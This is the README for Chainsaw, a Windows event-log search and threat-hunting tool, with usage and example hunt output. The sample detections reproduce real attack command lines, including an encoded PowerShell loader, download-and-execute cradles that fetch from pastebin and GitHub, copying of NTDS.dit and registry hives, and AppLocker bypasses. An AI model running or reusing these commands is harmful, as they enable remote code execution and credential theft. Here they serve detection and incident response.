Rapidly Search and Hunt through Windows Event Logs

Overview

Rapidly Search and Hunt through Windows Event Logs


Chainsaw provides a powerful ‘first-response’ capability to quickly identify threats within Windows event logs. It offers a generic and fast method of searching through event logs for keywords, and by identifying threats using built-in detection logic and via support for Sigma detection rules.

Features


  • 🔍 Search and extract event log records by event IDs, string matching, and regex patterns
  • 🎯 Hunt for threats using Sigma detection rules and custom built-in detection logic
  • Lightning fast, written in rust, wrapping the EVTX parser library by @OBenamram
  • 🔥 Document tagging (detection logic matching) provided by the TAU Engine Library
  • 📑 Output in an ASCII table format, CSV format, or JSON format

Hunting Logic


Sigma Rule Matching

Using the --rules and --mapping parameters you can specify a directory containing a subset of SIGMA detection rules (or just the entire SIGMA git repo) and chainsaw will automatically load, convert and run these rules against the provided event logs. The mapping file tells chainsaw what event IDs to run the detection rules against, and what fields are relevant. By default the following event IDs are supported:

Event Type Event ID
Process Creation (Sysmon) 1
Network Connections (Sysmon) 3
Image Loads (Sysmon) 7
File Creation (Sysmon) 11
Registry Events (Sysmon) 13
Powershell Script Blocks 4104
Process Creation 4688
Scheduled Task Creation 4698
Service Creation 7045

Built-In Logic

  1. Extraction and parsing of Windows Defender, F-Secure, Sophos, and Kaspersky AV alerts
  2. Detection of key event logs being cleared, or the event log service being stopped
  3. Users being created or added to sensitive user groups
  4. Brute-force of local user accounts
  5. RDP Logins

You can specify the --lateral-all flag to chainsaw to also parse and extract additional 4624 logon types (network logons, service, batch etc.) relating to potential lateral movement that may be interesting for investigations.

Getting Started


You can find pre-compiled versions of chainsaw in the releases section of this Github repo, or you can clone the repo (and the submodules) by running: git clone --recurse-submodules https://github.com/countercept/chainsaw.git

You can then compile the code yourself by running: cargo build --release. Once the build has finished, you will find a copy of the compiled binary in the target/release folder.

Make sure to build with the --release flag as this will ensure significantly faster execution time.

If you want to quickly see what Chainsaw looks like when it runs, you can use the command:

./chainsaw hunt evtx_attack_samples/ --rules sigma_rules/ --mapping mapping_files/sigma-mapping.yml

Supporting Additional Event IDs (via Mapping Files)

When using Sigma rule detection logic, Chainsaw requires a 'mapping file' to tell it which event IDs to check, what fields are important, and which fields to output in the table view. The included sigma mapping in the "mapping_files" directory already supports most of the key Event IDs, but if you want to add support for additional event IDs you can use this mapping file as a template.

Examples


Searching

Help Output:

USAGE:
    chainsaw search [FLAGS] [OPTIONS] <evtx-path>

FLAGS:
    -i, --case_insensitive
    -h, --help                Prints help information
    -V, --version             Prints version information

OPTIONS:
    -e, --event <event-id>
    -o, --output <output-file>
    -r, --regex_search <search-regex>
    -s, --string <search-string>

ARGS:
    <evtx-path>

Command Examples

Search all .evtx files in the evtx_files dir for event id 4624

./chainsaw search ~/Downloads/evtx_files/ -e 4624

Search a specific evtx log for logon events containing the string "bob" (case insensitive)

./chainsaw search ~/Downloads/evtx_files/security.evtx -e 4624 -s "bob" -i

Search a specific evtx log for logon events, with a matching regex pattern. Save results to file

 ./chainsaw search ~/Downloads/evtx_files/security.evtx -e 4624 -r "bob[a-zA-Z]" -o out.txt

Hunting

Help Output:

USAGE:
	chainsaw hunt [FLAGS] [OPTIONS] <evtx-path>

FLAGS:
        --csv
            Save hunt output to individual CSV file, otherwise output in a table format

        --no-builtin
            Do not use inbuilt detection logic, only use the specified rules for detection

        --full
            Show full event output, otherwise output is trunctated to improve readability

    -h, --help
            Prints help information

        --lateral-all
            List additional 4624 events potentially relating to lateral movement

    -V, --version
            Prints version information


OPTIONS:
        --col-width <col-width>
            Change the maximum column width (default 40). Use this option if the table output is un-readable [default:
            40]
        --json <json-output>
            Save the full event log and associated detections to disk in a JSON format to the specified path

    -m, --mapping <mapping-path>
            Specify the mapping file to use to with the specified detection rules. Required when using the --rule/-r
            flag
    -r, --rules <rules-path>
            Specify a directory containing detection rules to use. All files matching *.yml will be used


ARGS:
    <evtx-path>
            Specify an EVTX file, or a directory containing the EVTX files to search. If you specify a directory, all
            files matching *.evtx will be used.

            Specifying "win_default" will use "C:\Windows\System32\winevt\Logs\"

Command Examples

Hunt through all event logs in a specific path, show additional information relating to potential lateral movement, and save results to individual CSV files

-> % ./chainsaw hunt evtx_attack_samples/ --lateral-all --csv

 ██████╗██╗  ██╗ █████╗ ██╗███╗   ██╗███████╗ █████╗ ██╗    ██╗
██╔════╝██║  ██║██╔══██╗██║████╗  ██║██╔════╝██╔══██╗██║    ██║
██║     ███████║███████║██║██╔██╗ ██║███████╗███████║██║ █╗ ██║
██║     ██╔══██║██╔══██║██║██║╚██╗██║╚════██║██╔══██║██║███╗██║
╚██████╗██║  ██║██║  ██║██║██║ ╚████║███████║██║  ██║╚███╔███╔╝
 ╚═════╝╚═╝  ╚═╝╚═╝  ╚═╝╚═╝╚═╝  ╚═══╝╚══════╝╚═╝  ╚═╝ ╚══╝╚══╝
    By F-Secure Countercept (Author: @FranticTyping)
[+] Found 20 EVTX files
[!] Continuing without Detection rules, no path provided
[+] Saving results to CSV files

[+] Created chainsaw_2021-06-28T20-42-25/system_log_was_cleared.csv
[+] Created chainsaw_2021-06-28T20-42-25/event_log_service_stopped.csv
[+] Created chainsaw_2021-06-28T20-42-25/new_user_created.csv
[+] Created chainsaw_2021-06-28T20-42-25/4624_logins.csv
[+] Created chainsaw_2021-06-28T20-42-25/user_added_to_interesting_group.csv
[+] Created chainsaw_2021-06-28T20-42-25/audit_log_was_cleared.csv
[+] Created chainsaw_2021-06-28T20-42-25/account_brute_forcing.csv

[+] 18 Detections found

Hunt through all event logs in a specific path, apply detection logic and TAU rules from the specified path

-> % ./chainsaw hunt evtx_attack_samples/ --rules sigma_rules/ --mapping mapping_files/sigma-mapping.yml

 ██████╗██╗  ██╗ █████╗ ██╗███╗   ██╗███████╗ █████╗ ██╗    ██╗
██╔════╝██║  ██║██╔══██╗██║████╗  ██║██╔════╝██╔══██╗██║    ██║
██║     ███████║███████║██║██╔██╗ ██║███████╗███████║██║ █╗ ██║
██║     ██╔══██║██╔══██║██║██║╚██╗██║╚════██║██╔══██║██║███╗██║
╚██████╗██║  ██║██║  ██║██║██║ ╚████║███████║██║  ██║╚███╔███╔╝
 ╚═════╝╚═╝  ╚═╝╚═╝  ╚═╝╚═╝╚═╝  ╚═══╝╚══════╝╚═╝  ╚═╝ ╚══╝╚══╝
    By F-Secure Countercept (Author: @FranticTyping)

[+] Found 266 EVTX files
[+] Loaded 734 detection rules (74 were not loadeD)
[+] Printing results to screen
[+] Hunting: [========================================] 100%

[+] Detection: Security audit log was cleared
┌─────────────────────┬──────┬───────────────────────────────────┬─────────────────┐
│     system_time     │  id  │             computer              │  subject_user   │
├─────────────────────┼──────┼───────────────────────────────────┼─────────────────┤
│ 2019-01-20 07:00:50 │ 1102 │ "WIN-77LTAPHIQ1R.example.corp"    │ "Administrator" │
├─────────────────────┼──────┼───────────────────────────────────┼─────────────────┤
│ 2019-01-20 07:29:57 │ 1102 │ "WIN-77LTAPHIQ1R.example.corp"    │ "Administrator" │
├─────────────────────┼──────┼───────────────────────────────────┼─────────────────┤
│ 2019-11-15 08:19:02 │ 1102 │ "alice.insecurebank.local"        │ "bob"           │
├─────────────────────┼──────┼───────────────────────────────────┼─────────────────┤
│ 2020-07-22 20:29:27 │ 1102 │ "01566s-win16-ir.threebeesco.com" │ "a-jbrown"      │
├─────────────────────┼──────┼───────────────────────────────────┼─────────────────┤
│ 2020-09-02 11:47:39 │ 1102 │ "01566s-win16-ir.threebeesco.com" │ "a-jbrown"      │
├─────────────────────┼──────┼───────────────────────────────────┼─────────────────┤
│ 2020-09-15 18:04:36 │ 1102 │ "MSEDGEWIN10"                     │ "IEUser"        │
├─────────────────────┼──────┼───────────────────────────────────┼─────────────────┤
│ 2020-09-15 19:28:17 │ 1102 │ "01566s-win16-ir.threebeesco.com" │ "a-jbrown"      │
├─────────────────────┼──────┼───────────────────────────────────┼─────────────────┤
│ 2020-09-17 10:57:37 │ 1102 │ "01566s-win16-ir.threebeesco.com" │ "a-jbrown"      │
├─────────────────────┼──────┼───────────────────────────────────┼─────────────────┤
│ 2020-09-23 16:49:41 │ 1102 │ "01566s-win16-ir.threebeesco.com" │ "Administrator" │
└─────────────────────┴──────┴───────────────────────────────────┴─────────────────┘

[+] Detection: Suspicious Command Line
┌─────────────────────┬──────┬──────────────────────────────┬─────────────────────┬─────────────────────────────┬───────────────────────────────────┐
│     system_time     │  id  │       detection_rules        │    computer_name    │ Event.EventData.CommandLine │           process_name            │
├─────────────────────┼──────┼──────────────────────────────┼─────────────────────┼─────────────────────────────┼───────────────────────────────────┤
│ 2019-02-13 18:03:28 │ 4688 │ ‣ Exfiltration and Tunneling │ "PC01.example.corp" │ <empty>                     │ C:\Users\user01\Desktop\plink.exe │
│                     │      │ Tools Execution              │                     │                             │                                   │
└─────────────────────┴──────┴──────────────────────────────┴─────────────────────┴─────────────────────────────┴───────────────────────────────────┘

[+] Detection: Suspicious Process Creation
┌─────────────────────┬────┬──────────────────────────────────────────┬────────────────────────────────┬────────────────────────────────────────────────────┬────────────────────────────────────────────────────┐
│     system_time     │ id │             detection_rules              │         computer_name          │               Event.EventData.Image                │                    command_line                    │
├─────────────────────┼────┼──────────────────────────────────────────┼────────────────────────────────┼────────────────────────────────────────────────────┼────────────────────────────────────────────────────┤
│ 2019-02-16 10:02:21 │ 1  │ ‣ Exfiltration and Tunneling             │ "PC01.example.corp"            │ C:\Users\IEUser\Desktop\plink.exe                  │ plink.exe 10.0.2.18 -P 80 -C -R 127.0.0.3:4444:127 │
│                     │    │ Tools Execution                          │                                │                                                    │ .0.0.2:3389 -l test -pw test                       │
├─────────────────────┼────┼──────────────────────────────────────────┼────────────────────────────────┼────────────────────────────────────────────────────┼────────────────────────────────────────────────────┤
│ 2019-03-17 20:18:09 │ 1  │ ‣ Netsh Port or Application              │ "PC04.example.corp"            │ C:\Windows\System32\netsh.exe                      │ netsh advfirewall firewall add rule name="Remote D │
│                     │    │ Allowed                                  │                                │                                                    │ esktop" dir=in protocol=tcp localport=3389 profile │
│                     │    │ ‣ Netsh RDP Port Opening                 │                                │                                                    │ =any action=allow                                  │
├─────────────────────┼────┼──────────────────────────────────────────┼────────────────────────────────┼────────────────────────────────────────────────────┼────────────────────────────────────────────────────┤
│ 2019-03-17 20:20:17 │ 1  │ ‣ File or Folder Permissions             │ "PC04.example.corp"            │ C:\Windows\System32\icacls.exe                     │ "C:\Windows\System32\icacls.exe" C:\Windows\System │
│                     │    │ Modifications                            │                                │                                                    │ 32\termsrv.dll /grant %%username%%:F               │
├─────────────────────┼────┼──────────────────────────────────────────┼────────────────────────────────┼────────────────────────────────────────────────────┼────────────────────────────────────────────────────┤
│ 2019-03-17 20:20:17 │ 1  │ ‣ File or Folder Permissions             │ "PC04.example.corp"            │ C:\Windows\System32\icacls.exe                     │ "C:\Windows\System32\icacls.exe" C:\Windows\System │
│                     │    │ Modifications                            │                                │                                                    │ 32\termsrv.dll /grant *S-1-1-0:(F)                 │
├─────────────────────┼────┼──────────────────────────────────────────┼────────────────────────────────┼────────────────────────────────────────────────────┼────────────────────────────────────────────────────┤
│ 2019-04-27 18:47:00 │ 1  │ ‣ Execution from Suspicious              │ "IEWIN7"                       │ C:\Users\Public\KeeFarce.exe                       │ KeeFarce.exe                                       │
│                     │    │ Folder                                   │                                │                                                    │                                                    │
├─────────────────────┼────┼──────────────────────────────────────────┼────────────────────────────────┼────────────────────────────────────────────────────┼────────────────────────────────────────────────────┤
│ 2019-04-29 20:59:21 │ 1  │ ‣ Non Interactive PowerShell             │ "IEWIN7"                       │ C:\Windows\System32\WindowsPowerShell\v1.0\powersh │ "C:\Windows\System32\WindowsPowerShell\v1.0\powers │
│                     │    │                                          │                                │ ell.exe                                            │ hell.exe" -s -NoLogo -NoProfile                    │
├─────────────────────┼────┼──────────────────────────────────────────┼────────────────────────────────┼────────────────────────────────────────────────────┼────────────────────────────────────────────────────┤
│ 2019-04-29 20:59:22 │ 1  │ ‣ Local Accounts Discovery               │ "IEWIN7"                       │ C:\Windows\System32\whoami.exe                     │ "C:\Windows\system32\whoami.exe" /all              │
├─────────────────────┼────┼──────────────────────────────────────────┼────────────────────────────────┼────────────────────────────────────────────────────┼────────────────────────────────────────────────────┤
│ 2019-04-30 07:46:15 │ 1  │ ‣ Meterpreter or Cobalt                  │ "IEWIN7"                       │ C:\Windows\System32\cmd.exe                        │ cmd.exe /c echo msdhch > \\.\pipe\msdhch           │
│                     │    │ Strike Getsystem Service                 │                                │                                                    │                                                    │
│                     │    │ Start                                    │                                │                                                    │                                                    │
├─────────────────────┼────┼──────────────────────────────────────────┼────────────────────────────────┼────────────────────────────────────────────────────┼────────────────────────────────────────────────────┤
│ 2019-04-30 20:26:52 │ 1  │ ‣ Mimikatz Command Line                  │ "IEWIN7"                       │ C:\Windows\System32\cmd.exe                        │ C:\Windows\system32\cmd.exe /b /c start /b /min po │
│                     │    │ ‣ FromBase64String Command               │                                │                                                    │ wershell.exe -nop -w hidden -noni -c "if([IntPtr]: │
│                     │    │ Line                                     │                                │                                                    │ :Size -eq 4){$b='powershell.exe'}else{$b=$env:wind │
│                     │    │ ‣ Curl Start Combination                 │                                │                                                    │ ir+'\syswow64\WindowsPowerShell\v1.0\powershell.ex │
│                     │    │                                          │                                │                                                    │ e'};$s=New-Object System.Diagnostics.ProcessStartI │
│                     │    │                                          │                                │                                                    │ nfo;$s.FileName=$b;$s.Arguments='-noni -nop -w hid │
│                     │    │                                          │                                │                                                    │ den -c &([scriptblock]::create((New-Object IO.Stre │
│                     │    │                                          │                                │                                                    │ amReader(New-Object IO.Compression.GzipStream((New │
│                     │    │                                          │                                │                                                    │ -Object IO.MemoryStream(,[Convert]::FromBase64Stri │
│                     │    │                                          │                                │                                                    │ ng(''H4sIAIuvyFwCA7VW+2/aSBD+OZH6P1gVErZCMA60aSJVu │
│                     │    │                                          │                                │                                                    │ jVPE5xADITHodNir+0lay/Ya169/u83Btym1/SuPeksHruzM7M │
│                     │    │                                          │                                │                                                    │ z33w7azcJbUF5KM2DxU1J+vTm/KyLIxxIco6MClKOmsrZGQhz5 │
│                     │    │                                          │                                │                                                    │ Er6KMlTtFzWeIBpOLu9rSZRREJxnBebRKA4JsGcURLLivSn9OS │
│                     │    │                                          │                                │                                                    │ TiFw+zBfEFtInKfdHscn4HLOT2q6KbZ9Ilyh00rUOt3EaSdFaM │
│                     │    │                                          │                                │                                                    │ irk/O+/55XppTYr1lcJZrGct3axIEHRYSyvSJ+VdMP+bknkvEn │
│                     │    │                                          │                                │                                                    │ tiMfcFcUnGpavioMwxi65B29rYhLhcyfOK5ADfCIikiiUIJvU/ │
│                     │    │                                          │                                │                                                    │ Lgo52HYjbiNHCcicZwvSNPU8XQ2+02ennZ9TEJBA1I0QkEivrR │
│                     │    │                                          │                                │                                                    │ ItKY2iYstHDqMPBJ3BlaWiGjozRQF1Nb8mci5MGGsIP2KG/meb │
│                     │    │                                          │                                │                                                    │ DLMftZIfmkEWl0RKYW0gn/P0uROwsjRLv9KmFBzBZ5j3QGyz2/ │
│                     │    │                                          │                                │                                                    │ O35y7GUVWdyP6kiEwOpsexgQCk7s8pg...                 │
│                     │    │                                          │                                │                                                    │                                                    │
│                     │    │                                          │                                │                                                    │ (use --full to show all content)                   │
├─────────────────────┼────┼──────────────────────────────────────────┼────────────────────────────────┼────────────────────────────────────────────────────┼────────────────────────────────────────────────────┤
│ 2019-04-30 20:26:52 │ 1  │ ‣ Mimikatz Command Line                  │ "IEWIN7"                       │ C:\Windows\System32\WindowsPowerShell\v1.0\powersh │ powershell.exe -nop -w hidden -noni -c "if([IntPtr │
│                     │    │ ‣ FromBase64String Command               │                                │ ell.exe                                            │ ]::Size -eq 4){$b='powershell.exe'}else{$b=$env:wi │
│                     │    │ Line                                     │                                │                                                    │ ndir+'\syswow64\WindowsPowerShell\v1.0\powershell. │
│                     │    │ ‣ Non Interactive PowerShell             │                                │                                                    │ exe'};$s=New-Object System.Diagnostics.ProcessStar │
│                     │    │                                          │                                │                                                    │ tInfo;$s.FileName=$b;$s.Arguments='-noni -nop -w h │
│                     │    │                                          │                                │                                                    │ idden -c &([scriptblock]::create((New-Object IO.St │
│                     │    │                                          │                                │                                                    │ reamReader(New-Object IO.Compression.GzipStream((N │
│                     │    │                                          │                                │                                                    │ ew-Object IO.MemoryStream(,[Convert]::FromBase64St │
│                     │    │                                          │                                │                                                    │ ring(''H4sIAIuvyFwCA7VW+2/aSBD+OZH6P1gVErZCMA60aSJ │
│                     │    │                                          │                                │                                                    │ VujVPE5xADITHodNir+0lay/Ya169/u83Btym1/SuPeksHruzM │
│                     │    │                                          │                                │                                                    │ 7Mz33w7azcJbUF5KM2DxU1J+vTm/KyLIxxIco6MClKOmsrZGQh │
│                     │    │                                          │                                │                                                    │ z5Er6KMlTtFzWeIBpOLu9rSZRREJxnBebRKA4JsGcURLLivSn9 │
│                     │    │                                          │                                │                                                    │ OSTiFw+zBfEFtInKfdHscn4HLOT2q6KbZ9Ilyh00rUOt3EaSdF │
│                     │    │                                          │                                │                                                    │ aMirk/O+/55XppTYr1lcJZrGct3axIEHRYSyvSJ+VdMP+bknkv │
│                     │    │                                          │                                │                                                    │ EntiMfcFcUnGpavioMwxi65B29rYhLhcyfOK5ADfCIikiiUIJv │
│                     │    │                                          │                                │                                                    │ U/Lgo52HYjbiNHCcicZwvSNPU8XQ2+02ennZ9TEJBA1I0QkEiv │
│                     │    │                                          │                                │                                                    │ rRItKY2iYstHDqMPBJ3BlaWiGjozRQF1Nb8mci5MGGsIP2KG/m │
│                     │    │                                          │                                │                                                    │ ebDLMftZIfmkEWl0RKYW0gn/P0uROwsjRLv9KmFBzBZ5j3QGyz │
│                     │    │                                          │                                │                                                    │ 2/O35y7GUVWdyP6kiEwOpsexgQCk7s8pge9j1KpIJmwCRY82sE │
│                     │    │                                          │                                │                                                    │ 0148Sosy+wCrl3Gbhx9ZapgqKfP+0Bd...                 │
│                     │    │                                          │                                │                                                    │                                                    │
│                     │    │                                          │                                │                                                    │ (use --full to show all content)                   │
├─────────────────────┼────┼──────────────────────────────────────────┼────────────────────────────────┼────────────────────────────────────────────────────┼────────────────────────────────────────────────────┤
│ 2019-07-19 15:11:26 │ 1  │ ‣ Shadow Copies Creation                 │ "MSEDGEWIN10"                  │ C:\Windows\System32\vssadmin.exe                   │ vssadmin.exe create shadow /for=C:                 │
│                     │    │ Using Operating Systems                  │                                │                                                    │                                                    │
│                     │    │ Utilities                                │                                │                                                    │                                                    │
├─────────────────────┼────┼──────────────────────────────────────────┼────────────────────────────────┼────────────────────────────────────────────────────┼────────────────────────────────────────────────────┤
│ 2019-07-19 15:11:27 │ 1  │ ‣ Copying Sensitive Files                │ "MSEDGEWIN10"                  │ C:\Windows\System32\cmd.exe                        │ "C:\Windows\system32\cmd.exe" /c "copy \\?\GLOBALR │
│                     │    │ with Credential Data                     │                                │                                                    │ OOT\Device\HarddiskVolumeShadowCopy1\Windows\NTDS\ │
│                     │    │                                          │                                │                                                    │ NTDS.dit C:\Extract\ntds.dit"                      │
├─────────────────────┼────┼──────────────────────────────────────────┼────────────────────────────────┼────────────────────────────────────────────────────┼────────────────────────────────────────────────────┤
│ 2019-07-19 15:11:27 │ 1  │ ‣ Copying Sensitive Files                │ "MSEDGEWIN10"                  │ C:\Windows\System32\cmd.exe                        │ "C:\Windows\system32\cmd.exe" /c "copy \\?\GLOBALR │
│                     │    │ with Credential Data                     │                                │                                                    │ OOT\Device\HarddiskVolumeShadowCopy1\Windows\Syste │
│                     │    │                                          │                                │                                                    │ m32\config\SYSTEM C:\Extract\VSC_SYSTEM_HIVE"      │
├─────────────────────┼────┼──────────────────────────────────────────┼────────────────────────────────┼────────────────────────────────────────────────────┼────────────────────────────────────────────────────┤
│ 2019-07-26 07:39:14 │ 1  │ ‣ HH.exe Execution                       │ "MSEDGEWIN10"                  │ C:\Windows\hh.exe                                  │ "C:\Windows\hh.exe" C:\Users\IEUser\Desktop\Fax Re │
│                     │    │                                          │                                │                                                    │ cord N104F.chm                                     │
├─────────────────────┼────┼──────────────────────────────────────────┼────────────────────────────────┼────────────────────────────────────────────────────┼────────────────────────────────────────────────────┤
│ 2019-07-26 07:39:14 │ 1  │ ‣ HTML Help Shell Spawn                  │ "MSEDGEWIN10"                  │ C:\Windows\System32\cmd.exe                        │ "C:\Windows\System32\cmd.exe" /c copy /Y C:\Window │
│                     │    │ ‣ Suspicious Rundll32 Activity           │                                │                                                    │ s\system32\rundll32.exe %%TEMP%%\out.exe > nul &&  │
│                     │    │                                          │                                │                                                    │ %%TEMP%%\out.exe javascript:"\..\mshtml RunHTMLApp │
│                     │    │                                          │                                │                                                    │ lication ";document.write();h=new%%20ActiveXObject │
│                     │    │                                          │                                │                                                    │ ("WinHttp.WinHttpRequest.5.1");h.Open("GET","http: │
│                     │    │                                          │                                │                                                    │ //pastebin.com/raw/y2CjnRtH",false);try{h.Send();b │
│                     │    │                                          │                                │                                                    │ =h.ResponseText;eval(b);}catch(e){new%%20ActiveXOb │
│                     │    │                                          │                                │                                                    │ ject("WScript.Shell").Run("cmd /c taskkill /f /im  │
│                     │    │                                          │                                │                                                    │ out.exe",0,true);}                                 │
├─────────────────────┼────┼──────────────────────────────────────────┼────────────────────────────────┼────────────────────────────────────────────────────┼────────────────────────────────────────────────────┤
│ 2019-07-29 21:11:17 │ 1  │ ‣ Suspicious Rundll32 Activity           │ "MSEDGEWIN10"                  │ C:\Windows\System32\rundll32.exe                   │ "C:\Windows\system32\rundll32.exe" Shell32.dll,Con │
│                     │    │                                          │                                │                                                    │ trol_RunDLL "C:\Users\IEUser\Downloads\Invoice@058 │
│                     │    │                                          │                                │                                                    │ 2.cpl",                                            │
├─────────────────────┼────┼──────────────────────────────────────────┼────────────────────────────────┼────────────────────────────────────────────────────┼────────────────────────────────────────────────────┤
│ 2019-07-29 21:11:17 │ 1  │ ‣ Suspicious Call by Ordinal             │ "MSEDGEWIN10"                  │ C:\Windows\SysWOW64\rundll32.exe                   │ "C:\Windows\SysWOW64\rundll32.exe" "C:\Windows\Sys │
│                     │    │                                          │                                │                                                    │ WOW64\shell32.dll",#44 "C:\Users\IEUser\Downloads\ │
│                     │    │                                          │                                │                                                    │ [email protected]",                                 │
├─────────────────────┼────┼──────────────────────────────────────────┼────────────────────────────────┼────────────────────────────────────────────────────┼────────────────────────────────────────────────────┤
│ 2019-07-29 21:32:58 │ 1  │ ‣ Suspicious Certutil Command            │ "MSEDGEWIN10"                  │ C:\Windows\System32\cmd.exe                        │ cmd /c certutil -f -decode fi.b64 AllTheThings.dll │
│                     │    │                                          │                                │                                                    │                                                    │
├─────────────────────┼────┼──────────────────────────────────────────┼────────────────────────────────┼────────────────────────────────────────────────────┼────────────────────────────────────────────────────┤
│ 2019-07-29 21:32:59 │ 1  │ ‣ Suspicious Certutil Command            │ "MSEDGEWIN10"                  │ C:\Windows\System32\certutil.exe                   │ certutil -f -decode fi.b64 AllTheThings.dll        │
├─────────────────────┼────┼──────────────────────────────────────────┼────────────────────────────────┼────────────────────────────────────────────────────┼────────────────────────────────────────────────────┤
│ 2019-07-29 21:33:03 │ 1  │ ‣ Bitsadmin Download                     │ "MSEDGEWIN10"                  │ C:\Windows\System32\bitsadmin.exe                  │ bitsadmin.exe /transfer "JobName" https://raw.gith │
│                     │    │                                          │                                │                                                    │ ubusercontent.com/op7ic/EDR-Testing-Script/master/ │
│                     │    │                                          │                                │                                                    │ Payloads/CradleTest.txt "C:\Windows\system32\Defau │
│                     │    │                                          │                                │                                                    │ lt_File_Path.ps1"                                  │
├─────────────────────┼────┼──────────────────────────────────────────┼────────────────────────────────┼────────────────────────────────────────────────────┼────────────────────────────────────────────────────┤
│ 2019-07-29 21:33:18 │ 1  │ ‣ Mshta JavaScript Execution             │ "MSEDGEWIN10"                  │ C:\Windows\System32\mshta.exe                      │ mshta.exe javascript:a=GetObject("script:https://r │
│                     │    │ ‣ Suspicious Rundll32 Activity           │                                │                                                    │ aw.githubusercontent.com/op7ic/EDR-Testing-Script/ │
│                     │    │                                          │                                │                                                    │ master/Payloads/Mshta_calc.sct").Exec();close();   │
├─────────────────────┼────┼──────────────────────────────────────────┼────────────────────────────────┼────────────────────────────────────────────────────┼────────────────────────────────────────────────────┤
│ 2019-07-29 21:33:23 │ 1  │ ‣ Encoded PowerShell Command             │ "MSEDGEWIN10"                  │ C:\Windows\System32\WindowsPowerShell\v1.0\powersh │ powershell -c "(New-Object Net.WebClient).Download │
│                     │    │ Line                                     │                                │ ell.exe                                            │ File('https://raw.githubusercontent.com/op7ic/EDR- │
│                     │    │ ‣ Non Interactive PowerShell             │                                │                                                    │ Testing-Script/master/Payloads/CradleTest.txt','De │
│                     │    │                                          │                                │                                                    │ fault_File_Path.ps1');IEX((-Join([IO.File]::ReadAl │
│                     │    │                                          │                                │                                                    │ lBytes('Default_File_Path.ps1')|ForEach-Object{[Ch │
│                     │    │                                          │                                │                                                    │ ar]$_})))"                                         │
├─────────────────────┼────┼──────────────────────────────────────────┼────────────────────────────────┼────────────────────────────────────────────────────┼────────────────────────────────────────────────────┤
│ 2019-07-29 21:33:28 │ 1  │ ‣ Possible Applocker Bypass              │ "MSEDGEWIN10"                  │ C:\Windows\System32\cmd.exe                        │ cmd /c C:\Windows\Microsoft.NET\Framework\v4.0.303 │
│                     │    │                                          │                                │                                                    │ 19\regsvcs.exe AllTheThings.dll                    │
├─────────────────────┼────┼──────────────────────────────────────────┼────────────────────────────────┼────────────────────────────────────────────────────┼────────────────────────────────────────────────────┤
│ 2019-07-29 21:33:28 │ 1  │ ‣ Possible Applocker Bypass              │ "MSEDGEWIN10"                  │ C:\Windows\System32\cmd.exe                        │ cmd /c C:\Windows\Microsoft.NET\Framework\v2.0.507 │
│                     │    │                                          │                                │                                                    │ 27\regsvcs.exe AllTheThings.dll                    │
├─────────────────────┼────┼──────────────────────────────────────────┼────────────────────────────────┼────────────────────────────────────────────────────┼────────────────────────────────────────────────────┤
│ 2019-07-29 21:33:29 │ 1  │ ‣ Possible Applocker Bypass              │ "MSEDGEWIN10"                  │ C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegS │ C:\Windows\Microsoft.NET\Framework\v4.0.30319\regs │
│                     │    │                                          │                                │ vcs.exe                                            │ vcs.exe AllTheThings.dll                           │
├─────────────────────┼────┼──────────────────────────────────────────┼────────────────────────────────┼────────────────────────────────────────────────────┼────────────────────────────────────────────────────┤
│ 2019-07-29 21:33:29 │ 1  │ ‣ Possible Applocker Bypass              │ "MSEDGEWIN10"                  │ C:\Windows\System32\cmd.exe                        │ cmd /c C:\Windows\Microsoft.NET\Framework64\v2.0.5 │
│                     │    │                                          │                                │                                                    │ 0727\regsvcs.exe AllTheThings.dll                  │
├─────────────────────┼────┼──────────────────────────────────────────┼────────────────────────────────┼────────────────────────────────────────────────────┼────────────────────────────────────────────────────┤
│ 2019-07-29 21:33:29 │ 1  │ ‣ Possible Applocker Bypass              │ "MSEDGEWIN10"                  │ C:\Windows\System32\cmd.exe                        │ cmd /c C:\Windows\Microsoft.NET\Framework64\v4.0.3 │
│                     │    │                                          │                                │                                                    │ 0319\regsvcs.exe AllTheThings.dll                  │
├─────────────────────┼────┼──────────────────────────────────────────┼────────────────────────────────┼────────────────────────────────────────────────────┼────────────────────────────────────────────────────┤
│ 2019-07-29 21:33:34 │ 1  │ ‣ Possible Applocker Bypass              │ "MSEDGEWIN10"                  │ C:\Windows\System32\cmd.exe                        │ cmd /c C:\Windows\Microsoft.NET\Framework\v2.0.507 │
│                     │    │                                          │                                │                                                    │ 27\regasm.exe /U AllTheThings.dll                  │
├─────────────────────┼────┼──────────────────────────────────────────┼────────────────────────────────┼────────────────────────────────────────────────────┼────────────────────────────────────────────────────┤
│ 2020-12-04 22:41:04 │ 1  │ ‣ Suspicious Svchost Process             │ "MSEDGEWIN10"                  │ C:\Windows\System32\svchost.exe                    │ C:\Windows\system32\svchost.exe -k localService -p │
│                     │    │ ‣ Windows Processes Suspicious           │                                │                                                    │  -s RemoteRegistry                                 │
│                     │    │ Parent Directory                         │                                │                                                    │                                                    │
├─────────────────────┼────┼──────────────────────────────────────────┼────────────────────────────────┼────────────────────────────────────────────────────┼────────────────────────────────────────────────────┤
│ 2020-12-09 16:52:34 │ 1  │ ‣ Execution from Suspicious              │ "MSEDGEWIN10"                  │ C:\Users\Public\psexecprivesc.exe                  │ "C:\Users\Public\psexecprivesc.exe" C:\Windows\Sys │
│                     │    │ Folder                                   │                                │                                                    │ tem32\mspaint.exe                                  │
├─────────────────────┼────┼──────────────────────────────────────────┼────────────────────────────────┼────────────────────────────────────────────────────┼────────────────────────────────────────────────────┤
│ 2020-12-09 16:52:41 │ 1  │ ‣ PsExec Service Start                   │ "MSEDGEWIN10"                  │ C:\Windows\PSEXESVC.exe                            │ C:\Windows\PSEXESVC.exe                            │
├─────────────────────┼────┼──────────────────────────────────────────┼────────────────────────────────┼────────────────────────────────────────────────────┼────────────────────────────────────────────────────┤
│ 2021-01-26 13:21:13 │ 1  │ ‣ Possible Applocker Bypass              │ "LAPTOP-JU4M3I0E"              │ C:\Program Files (x86)\Microsoft Visual Studio\201 │ C:\Program Files (x86)\Microsoft Visual Studio\201 │
│                     │    │                                          │                                │ 9\Community\MSBuild\Current\Bin\MSBuild.exe        │ 9\Community\MSBuild\Current\Bin\MSBuild.exe /nolog │
│                     │    │                                          │                                │                                                    │ o /nodemode:1 /nodeReuse:true /low:false           │
├─────────────────────┼────┼──────────────────────────────────────────┼────────────────────────────────┼────────────────────────────────────────────────────┼────────────────────────────────────────────────────┤
